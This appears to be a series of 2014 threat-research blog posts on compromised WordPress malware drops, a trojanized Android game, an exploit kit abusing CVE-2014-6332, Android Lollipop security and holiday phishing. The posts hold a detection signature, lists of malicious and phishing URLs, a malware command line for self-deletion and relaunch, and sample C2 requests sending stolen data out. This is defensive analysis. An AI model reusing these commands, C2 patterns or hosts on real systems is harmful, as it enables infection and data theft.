Sunday, December 21, 2014

Compromised Wordpress sites serving multiple malware payloads

During our daily log monitoring process, we observe many interesting threat events. One such event led to a compromised WordPress site campaign, which was found to serve multiple malware families including Upatre/Hencitor/Extrat Xtreme RAT/Vawtrak. The URLs which were serving malware were found to adhere to a particular pattern. Infected WordPress sites observed, included URLs with "/1.php?r”. Emerging Threats (ET) had previously released a Snort signature for this campaign on 12/08/2014. Since then, we have been continuously monitoring the activities related to it. The following is the snort signature released by ET.
 
Snort Signature
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
CURRENT_EVENTS Probable malicious download from e-mail link /1.php";
flow:established,to_server; urilen:8; content:"/1.php?r"; http_uri;
content:!"Referer|3a 20|"; http_header;
flowbits:set,et.exploitkitlanding; classtype:bad-unknown; sid:2019894;
rev:1;)

Below are the compromised websites observed, which have been found to be serving multiple malware families.

Compromised wordpress websites
airlessspraysupplies[.]com/wp-includes/1[.]php?r
altero[.]be/1[.]php?r
alzina[.]cat/1[.]php?r
angeladoesfood[.]com/wp-admin/1[.]php?r
apsmiles[.]com/wp-content/themes/rfx/1[.]php?r
architecture[.]web[.]auth[.]gr/1[.]php?r
augustgifford[.]com/wp-admin/1[.]php?r
bankruptcy-software[.]com/wp-content/themes/classic/1[.]php?r
bernie[.]jshall[.]net/wp-content/themes/twentytwelve/1[.]php?r
beta[.]pescariusports[.]ro/images/1[.]php?r
blackwellanddenton[.]com/components/com_contact/1[.]php?r
blog[,]longboardsicecream[.]com/wp-content/plugins/1[.]php?r
blog[.]ridici-jednotky[.]cz/wp-content/plugins/simple4us/1[.]php?r
blog[.]topdealslondon[.]com/wp-content/uploads/1[.]php?r
cartorioalbuquerque[.]com[.]br/images/1[.]php?r
climatechange[.]mobi/images/1[.]php?r
core[.]is/1[.]php?r
couponshare[.]me/1[.]php?r
dannygill[.]co[.]uk/wp-content/plugins/simple4us/1[.]php?r
dlaciebie[.]org/wp-admin/1[.]php?r
geototal[.]az/en/ru/engine/editor/scripts/common/codemirror/mode/xml/1[.]php?r
kba1f9684c70[.]nazwa[.]pl/images/1[.]php?r
linkleads[.]vn/1[.]php?r
lionel[.]my/wp-content/plugins/akismet/1[.]php?r
livedoor[.]eu/1[.]php?r
ludovicharollais[.]org/wp-admin/1[.]php?r
m11[.]mobi/images/1[.]php?r
matthewkarant[.]com/wp-content/themes/twentynine/1[.]php?r
mcymbethel[.]com[.]ar/modules/mod_ariimageslider/1[.]php?r
merklab[.]eu/1[.]php?r
mitoyotaseagarrota[.]com/components/com_banners/1[.]php?r
mlmassagetherapy[.]com[.]au/wp-content/uploads/1[.]php?r
monitoring[.]sensomedia[.]hu/1[.]php?r
newwww[.]r11mis[.]be/images/1[.]php?r
odelia-coaching[.]co[.]il/wp-content/plugins/google-sitemap-generator/1[.]php?r
odelia-coaching[.]co[.]il/wp-content/plugins/google-sitemap-generator/1[.]php?r
osp[.]ruszow[.]liu[.]pl/images/1[.]php?r
pms[.]isovn[.]net/images/1[.]php?r
prodvizhenie-sajta[.]com/images/1[.]php?r
redmine[.]sensomedia[.]hu/1[.]php?r
salihajszalon[.]hu/1[.]php?r
sonicboommusic[.]com[.]au/components/com_banners/1[.]php?r
sparkledesign[.]ro/1[.]php?r
thebestcookbooks[.]co[.]uk/wp-content/plugins/1[.]php?r
thefoodstudio[.]co[.]nz/wp-content/themes/food-cook/1[.]php?r
thietkekientruca4[.]vn/1[.]php?r
treasurething[.]com/wp-includes/pomo/1[.]php?r
tsv-penzberg[.]de/wp-admin/1[.]php?r
turbomarketingteam[.]com/1[.]php?r
tusengangerstarkare[.]ingelaclarin[.]se/wp-admin/1[.]php?r
twobyones[.]com/1[.]php?r
xhmeiastokyma[.]gr/1[.]php?r
youreverlastingmemories[.]co[.]uk/1[.]php?r

These compromised WordPress sites may have been used by Exploit Kit (EK) authors as drop sites for serving malware. Another potential attack vector could involve email spam.
The following table shows different types of malware we have seen dropped from the aforementioned compromised sites. All malware was found to be zipped.
 
ZIP MD5ZIPFILE NAME
2f225283c66032c9f7dcb44f42697246fax_20141204_385.pdf.zip
6696527bfda97b1473d1047117ded8d6invoice.pdf.zip
93babef06bfd93bcbb5065c445fb57d4label_08122014_23.pdf.zip
bea9be813bb7df579d5be3e4543dc6a4payment_details9427923.pdf.zip
1159fe7ec4d0b2cfde57dfb28b98f0c9ePackage_12092014_42.pdf.zip
038710b2029046c39ca4082e2c34f9b3wav_voice20141208.zip
ec35acdbe331c73e5e6883ebc08f896dpayment_invoice_182734.pdf.zip
8f00cfdf067b01462670212ba5874cdbpdf_efax_9823612397.zip

Lets take a look at the files after unzipping them. All of the files are Windows screen savers and include fake icons of legitimate software packages, to persuade the victims to click on them.

Downloaded files:


For this post we've chosen to focus on the Hencitor malware. Hencitor’s typical behavior is to download additional malware onto the victim’s machine and execute it. 

MD5: 6bb3b23ff3e736d499775120aa8d6ae2
VT Score: 9/56 (At the time of analysis)

Lets take a look at some important things noted while conducting dynamic analysis of this malware.
  • Copies itself to 
    • "C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe”
  • Creates autostart registry key entry
    • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
      • "winlogin” = "C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe”
  • Uses ping.exe to check the status of other devices and networks.
    • cmd /D /R ping -n 10 localhost && del C:\payment_invoice_182734.pdf.scr.exe && start /B C:\Users\Win7 64Bit\AppData\Roaming\Windows\winlogin.exe && exit
  • Creates a thread in following existing process on the system.
    • C:\Windows\explorer.exe
    • C:\Windows\System32\sppsvc.exe
    • C:\Windows\System32\wbem\WmiPrvSE.exe
    • C:\Windows\System32\conhost.exe
  • Deletes itself after installation 
    • c:\payment_invoice_182734.pdf.scr.exe
  • Malware seen to resolve couple of suspicious tor sites. 
    • o3qz25zwu4or5mak.tor2web[.]org 
    • o3qz25zwu4or5mak.tor2web[.]ru 
Conclusion:
Compromising vulnerable WordPress sites to spread malware has become one of the more widely used attack vectors by EK’s and email spam campaigns. Such campaigns generally drop variants of well known malware families,  which are undetected by the AV vendors. By the time of analysis we observed poor detection rates for the malware samples involved in this campaign.

-Stay Safe

Top Security Features Added to Android Lollipop

As Google officially rolls out it's new operating system Lollipop, let's review some of the enhanced security features added to Android 5.0.

Lollipop
Kill switch
The most interesting new security feature is the Factory Reset Protection option, which is also known as the “kill switch.” To aid corporate and personal users dealing with stolen devices, the personal data stored within the device can now be remotely wiped and the phone made inoperable. With reports suggesting that over 3 million Americans had their smart phones stolen last year, it's easy to see why Google has added this feature to Lollipop.
Device management.
Encryption on the fly
Another valuable security feature available in Lollipop is default encryption. Although not an entirely new feature as previous Android did offer encryption, it needed to be explicitly enabled by the user. With Lollipop, the initial boot will prompt users to activate encryption. Thereafter, new data will be encrypted on the fly.

Improved malware protection and sandboxing
Lollipop is armed with SELinux (Security Enhanced Linux), which aims to provide enhanced protection against malware and vulnerabilities. This feature ensures secure app isolation, which helps to keep private data secure should the device be compromised. 

Smart Device Lock
The real privacy danger for most users is simply leaving a device unlocked and then having someone else gain access to personal data and open social profiles. Locking phone features should not be a tedious task that users avoid. Lollipop therefore introduces a new feature called Smart Lock to help combat this problem.

Smart Lock adds the ability to set trusted locations such as home or the office, where your device will open automatically once you enter that region. You can do the same in conjunction with specific Bluetooth and NFC enabled Android Wear smart watches. When sensing these trusted devices, Lollipop phones/tablets will lower their security shields as the owner is presumably present. Users are also able to set notification access prior to a security lock to allow actions such as sending a message.

Multiple User Profiles
As Internet social profiles and personal data like photos and contacts are generally the most sensitive information for a user, lending a phone to another person creates a security risk. Lollipop solves this issue by permitting multiple user profiles. Users can create a different guest profile which has limited access. The Owner account has access to the entire device and everything within it, as well as control over other profiles on the device. A User account, on the other hand, has limited access to certain apps and content controlled by the device’s main user, as well as limited calling and SMS capabilities. This feature is also beneficial for parents who can give their phone to their kids and only grant them access to a specific app or a game that they want them to play and nothing else on the device.

Want to scan Android apps for security and privacy issues? Try ZAP.

Thursday, December 11, 2014

Trojanized and Pirated Assassins Creed app

During our daily research, we recently came across Android malware disguising itself as an Assassins Creed app, which is a popular paid gaming application. The malware in question will install a pirated version of the Assassins Creed game that functions normally, making end user oblivious to the malicious activities it performs in background.

Application information:

Permissions:
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.GET_ACCOUNTS
  • android.permission.INTERNET
  • android.permission.PROCESS_OUTGOING_CALLS
  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_SMS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.WAKE_LOCK
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.WRITE_SMS
The malicious application is capable of sending multi-part text messages, harvesting text messages from a victim's device, and sending stolen information to a remote Command & Control (C2) server. We were able to locate phone numbers belonging to Russian bank "Volga-Vyatka Bank of Sberbank of Russia" in the malicious application code for which SMS messages are being intercepted to steal sensitive information. Another interesting feature we saw is the usage of AES encryption for all the C2 communication. It also harvests the mobile number and Subscriber ID information from the victim device for tracking purposes.

The screenshot below shows the AES crypto library configurations. All the sensitive harvested data and C2 communication is encrypted and decrypted using this configuration.



Code snippet showing the string containing the Russian Bank phone numbers:



Command and Control server information in encrypted and decrypted form:



We saw the following two command and control servers hardcoded in the malicious application:
  •  bnk7ihekqxp.net
  •  googleapiserver.net


The screenshot above shows the usage of AES for C2 communication. A sample call back request from the infected device will be of the following format:

"http://bnk7ihekqxp[.]net/iaefu.php?1=4fe08eb4b43XXXXXXXX&id=X".

The code snippet below shows the SMS and Subscriber ID information harvesting feature:


It sends the harvested information via a POST request as seen below:


Code snippet showing the SMS sending feature:


Code snippet showing the SMS interception and storage arrays:
.

The intercepted SMS data, Subscriber ID, and phone number information are then sent to the C2 server in an encrypted form
.

Here is a sample request:
http://googleapiserver.net/kysnfhwo.php?1=4fe08eXXXXXXXXXXXXXXXXXXXX&4=3XXXXXXXXXXXXXXX

The malicious app performs the activity of harvesting sensitive information and sending it to the remote server on a regular interval by setting up an alarm as seen below:


Upon installation, the user will see the game icon on the screen, that disappears shortly thereafter with the malicious process still running in the background.

Recommendation:

Cybercriminals often lure users with pirated versions of popular paid mobile applications that are Trojanized to steal sensitive information. It is strongly recommended that users stay away from such offers and download mobile app only from the trusted sources like the Google Play store.

Wednesday, November 26, 2014

Defaced websites leading to Dokta Chef Exploit Kit and CVE-2014-6332

Defacing websites has been the main stay for hacktivist groups to spread their message.  During recent research, we found multiple compromised websites containing a malicious link to a "lulz.htm" page, which in turn leads the user to a Dokta Chef Exploit Kit (EK) hosting site. This appears to be  a new tactic whereby a hacktivist group has escalated their activities by attacking users who visit defaced sites.  This is out of character for such groups that generally seem more interested in disrupting private sector compliance with government entities, than targeting end users.


The contact information provided on the defacement page shows that the culprits of this attack are claiming to be part of the "AnonGhostTeam" group, based on the associated Twitter account.  This group has targeted numerous Government and Mass Media websites in the past including:
  • swo.gov.sy
  • syrianpost.gov.sy
  • myisrael.org.il
  • madagascar.gov.mg
  • skynewsinternational.com
  • ccvs.state.vt.us
  • txep.uscourts.gov
  • rsb.wp.mil.pl
  • navy.gov.au
  • igc.mowr.gov.iq
  • embavenez.co.uk
  • libyanembassy-italy.gov.ly
The defaced pages have been lifted in most cases, leaving only a Zone-H mirror


Written in Beautiful Comic Sans
The defaced websites were found to be hosting a page called "lulz.htm", that contains highly obfuscated JavaScript code leading the users to a Dotka Chef EK infection cycle.

Obfuscated JavaScript on the compromised sites

CVE-2014-6332 exploit

The Dokta Chef EK, was serving a malicious payload for a recently disclosed Microsoft Vulnerability CVE-2014-6332, that causes remote code execution when the user visits a specially crafted webpage using Internet Explorer (IE). The vulnerability is triggered when IE improperly accesses Object Linking and Embedding (OLE) objects in the memory. The vulnerable code has been present in OleAut32 library since IE version 3.0 and was recently fixed - MS14-064


The attacker is targeting only the 32-bit Windows Operating systems and also ensuring that the user's browser is IE, as seen in the exploit code snippet above. The exploit cycle will terminate if any of the following conditions are true:
  • User is browsing from a 64-bit Windows Operating system
  • User is browsing from a non-Windows Operating system, 
  • User's browser is not IE


If the IE version used by the victim is lower than 4, the runshellcode() routine will be invoked, skipping the CVE-2014-6332 exploit cycle.  If the version used is higher than 3, setnotsafemode() routine is invoked to exploit the CVE-2014-6332 vulnerability.


The CVE-2014-6332 vulnerability is triggered by using an abnormally large array in conjunction with the redim Preserve function, as shown in the VBScript exploit code snippet above.

At the time of research, the end payload was not reachable, but the VirusTotal Scan of the hostname shows a history of dubious activity.

The Zscaler ThreatLabZ team has deployed multiple protections against this threat and is actively monitoring the malicious activity surrounding this mass compromise.

Tuesday, November 25, 2014

Beware of Phishing Attacks and Other Scams during the Thanksgiving Shopping Season



Black-Friday-Cyber-Monday-deals.jpgThanksgiving Day is one of the major holidays celebrated in the United States on the fourth Thursday in November. The following Friday, referred to as Black Friday, marks the start of the Christmas holiday shopping season. Almost every retailer large and small offers huge discounts on Black Friday, often extending through the weekend and the following Monday, now known as Cyber Monday.


As we near Thanksgiving and the start of the holiday shopping frenzy, we’re observing a sharp increase in cyber scams and phishing activities targeting online shoppers. As shoppers look for the best deals available, cybercriminals are quick to take advantage of unsuspecting users.

Increase in online shopping transactions

Every year during this timeframe, we observe a noticeable spike in the total number of web transactions within the Shopping category. We have shared this trend in our previous blogs as well ([1],[2]).

Last year, we saw around 2.71% of all the web transactions categorized as Shopping and this year is no different. We currently see that 2.63% of total web transactions belong to the Shopping category and we expect this number to rise as we approach the end of the month. The following chart shows that the number of Shopping transactions has increased steadily throughout November.


Cyber Scams and Phishing attacks

The increase in Shopping activity comes with an unwelcome increase in phishing attempts. Phishing is a well known attack method, often used by attackers to steal sensitive information like authentication credentials, credit card numbers and personal information. We have already seen a large spike in Phishing and Spam activity, specifically targeting Thanksgiving, Black Friday, and Cyber Monday events. The following graph shows the phishing transactions for this month that have been blocked by Zscaler:

phish.png
We caution consumers to be extra vigilant this holiday season when shopping online. Here are some examples of phishing attempts that we have blocked:

Walmart phishing attempt:

2.png


Amazon phishing attempt:

4.png
Ebay phishing attempt:

ebay.png

The motive behind these attempts is to steal sensitive user information which includes personal credentials and financial data. Cybercriminals often use this stolen information for illicit activities resulting in monetary gain.

More phishing sites targeting online retailers:
  • Ebay - hxxp://124[.]150[.]140[.]133/~ritenfad/viewitem/dll/88322933932/
  • Walmart - hxxp://ofertaswalmart[.]besaba.com
  • Walmart - hxxp://walmartfriday[.]net/
  • Amazon - hxxp://zekocase[.]com/._ama_c0nf1rm/info_bill/login.php
  • Amazon - 213[.]13[.]119[.]152/am/

Fake Black Friday/Cyber Monday/Thanksgiving related sites:
  • hxxp://sfspr[.]org/?hid=hollister-cyber-monday-cyber-monday-sale
  • hxxp://cyber-shop[.]net
  • hxxp://www[.]ocdiagnostics[.]net/?id=louboutin-loafers-cyber-monday-deals
  • hxxp://koeriersdienstdemolen[.]nl/wp-content/languages/?page=toms-soap-cyber-monday-2014
  • hxxp://devillevacaville[.]com/?tid=cyber-monday-toms-canada
  • hxxp://postyourads.co[.]uk/?mid=mulberry-bags-cyber-monday-deals
  • hxxp://semexcesso.com[.]br/?hid=hollister-girls-cyber-monday-2014
  • hxxp://dl5.iq11download[.]com/lm/lmdisc2/thanksgivingss.exe
  • hxxp://www[.]americanasblackfriday[.]esy[.]es
  • hxxp://www[.]systempackaging[.]com/images/ugg/black-friday-uggs-p-35.html
  • hxxp://busycatholicmoms[.]com/2013/11/26/new-articles-and-happy-thanksgiving/

Sample of subjects used in spam e-mail messages targeting online shoppers:

  • Get Stylish-furniture At Discount
  • Checkout tire sales for Black Friday
  • Make the Most of Black Friday, with A New smart-phone
  • Brand name laptops on sale for BlackFriday
  • [Black Friday Starts EARLY]Saveup to 90% +FREE BonusItems!
  • Walmart One Day Specials BlackFriday
  • Shop Black Friday sales to upgrade furniture
  • Thanksgiving Specials and BlackFriday Discounts!
  • New Early BlackFriday Door busters are Added EveryDay
  • Shop Black Friday to find discounts on electronics
  • Search major Savings on laptops...On black-friday
  • Limited Time Black Friday Deal
  • 10% off Site-Wide. Get Your Black Friday Shopping Started Today!
 
How can online shoppers protect themselves?

Thanksgiving marks the start of the holiday shopping season which continues until Christmas. The Zscaler ThreatLabZ team is working round the clock to ensure that our customers do not fall prey to such malicious activity.

We highly recommend that all online shoppers exercise extreme caution and follow our holiday season shopping security checklist:  

  • Inspect the source of emails with shopping deals

  • Ensure HTTPS/secure connections to online retailers and Banking sites

  • Check the authenticity of the URL or website address before clicking on a link

  • Stay away from e-mailed invoices - this is often a social engineering technique used by cybercriminals

  • Do not use insecure public WiFi for shopping

  • Use two-factor authentication whenever possible especially on sensitive accounts such as those used for banking

  • Always ensure that your Operating System and Web Browser have the latest security patches installed

  • Use browser add-ons like Adblock Plus to block popups and potential malvertisements

  • Backup your documents and media files


Wishing you all a very Happy Thanksgiving and don’t spend too much!

Credit for analysis: Rubin Azad, Uday Pratap Singh